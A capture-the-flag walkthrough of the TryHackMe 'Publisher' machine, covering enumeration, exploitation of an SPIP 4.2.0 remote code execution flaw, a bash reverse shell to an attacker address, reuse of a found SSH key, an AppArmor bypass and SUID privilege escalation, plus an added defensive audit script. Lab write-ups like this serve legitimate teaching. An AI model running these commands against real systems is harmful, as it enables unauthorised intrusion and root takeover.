Publisher - TryHackMe Walkthrough

Enumeration

Nmap Scan

We start with a comprehensive nmap scan:

sudo nmap -sC -sV -T4 {target_IP}

The scan reveals two open ports:

  • Port 22: OpenSSH 8.2p1 Ubuntu
  • Port 80: Apache httpd 2.4.41

Web Enumeration

The website appears to be a simple blog with no obvious functionality. Running a directory scan with feroxbuster reveals the /spip path.

[Screenshot: Publisher homepage]

Using Wappalyzer, we identify that the site is running SPIP version 4.2.0.

[Screenshot: SPIP version as reported by Wappalyzer]

Initial Access

Research reveals that SPIP 4.2.0 is vulnerable to Unauthenticated Remote Code Execution (CVE-2023-27372). We can exploit this using a publicly available exploit:

git clone https://github.com/Chocapikk/CVE-2023-27372.git
cd CVE-2023-27372
pip install -r requirements.txt
python CVE-2023-27372.py -u http://{target_IP}/spip/ -v -o report.txt

[Screenshot: RCE success]

Getting a Reverse Shell

We establish a reverse shell, with a listener waiting on port 9001, by running:

bash -c "bash -i >& /dev/tcp/{attacker_IP}/9001 0>&1"

[Screenshot: reverse shell]

Lateral Movement

We discover we’re in a Docker container. Manual enumeration reveals an SSH private key in the think user’s home directory:

[Screenshot: SSH private key]

We can use this key to gain SSH access as the think user:

ssh -i id_rsa think@{target_IP}

Privilege Escalation

Method 1: AppArmor Bypass

We discover AppArmor is running, which restricts file operations. After analyzing the AppArmor rules, we find we can write to /dev/shm:

echo '#!/usr/bin/perl
use POSIX qw(strftime);
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/sh"' > /dev/shm/test.pl
chmod +x /dev/shm/test.pl
/dev/shm/test.pl

Method 2: SUID Binary Exploitation

We find a SUID binary /usr/sbin/run_container that executes /opt/run_container.sh. Since we have write permissions to this script, we can modify it to add SUID to /bin/bash:

echo 'chmod +s /bin/bash' > /opt/run_container.sh
/usr/sbin/run_container
/bin/bash -p

[Screenshot: root access]
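A hardening check for the misconfiguration behind Method 2, added here as an example and not part of the original walkthrough (it assumes GNU or busybox find and stat on Linux): it lists SUID/SGID executables, extracts the absolute paths embedded in them, and flags any referenced file that is group- or world-writable, which is exactly the run_container / run_container.sh pattern.

```shell
#!/bin/sh
# Added hardening check, not from the walkthrough: find SUID/SGID executables
# and flag any file they reference by absolute path that is group- or
# world-writable. The walkthrough's /usr/sbin/run_container ->
# /opt/run_container.sh case is exactly this pattern.
# Assumes GNU/busybox find and stat (Linux).

# Print the unique absolute path strings embedded in a file
# (grep -a avoids a dependency on the strings(1) tool).
embedded_paths() {
  grep -aoE '/[A-Za-z0-9_./-]+' "$1" 2>/dev/null | sort -u
}

# Is the file writable by its group or by others?
loosely_writable() {
  find "$1" -maxdepth 0 \( -perm -g+w -o -perm -o+w \) 2>/dev/null | grep -q .
}

# Walk $1 (default /) and print one FINDING line per writable helper,
# together with the chmod that closes the hole.
audit_suid_helpers() {
  root="${1:-/}"
  find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
  while read -r bin; do
    embedded_paths "$bin" | while read -r ref; do
      [ -f "$ref" ] || continue
      if loosely_writable "$ref"; then
        printf 'FINDING: %s references %s (mode %s); fix: chmod go-w %s\n' \
          "$bin" "$ref" "$(stat -c %a "$ref")" "$ref"
      fi
    done
  done
}

# Run as root for a full system audit:
# audit_suid_helpers /
```

Run it as root so every SUID binary is readable; each FINDING line names the binary, the writable helper and the permission change that fixes it.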

Alternative Method

From the www-data shell, we can:

  1. Copy /bin/bash to /home/think/spip
  2. Set SUID bit
  3. Make it readable by everyone
  4. Execute it from the SSH session

Conclusion

This machine demonstrates several important security concepts:

  • Web application vulnerabilities (SPIP RCE)
  • Docker container escape
  • AppArmor bypass techniques
  • SUID binary exploitation
  • Multiple privilege escalation paths

Remember: Always look for multiple ways to achieve your goal, as there might be more than one path to success.

This post is licensed under CC BY 4.0 by the author.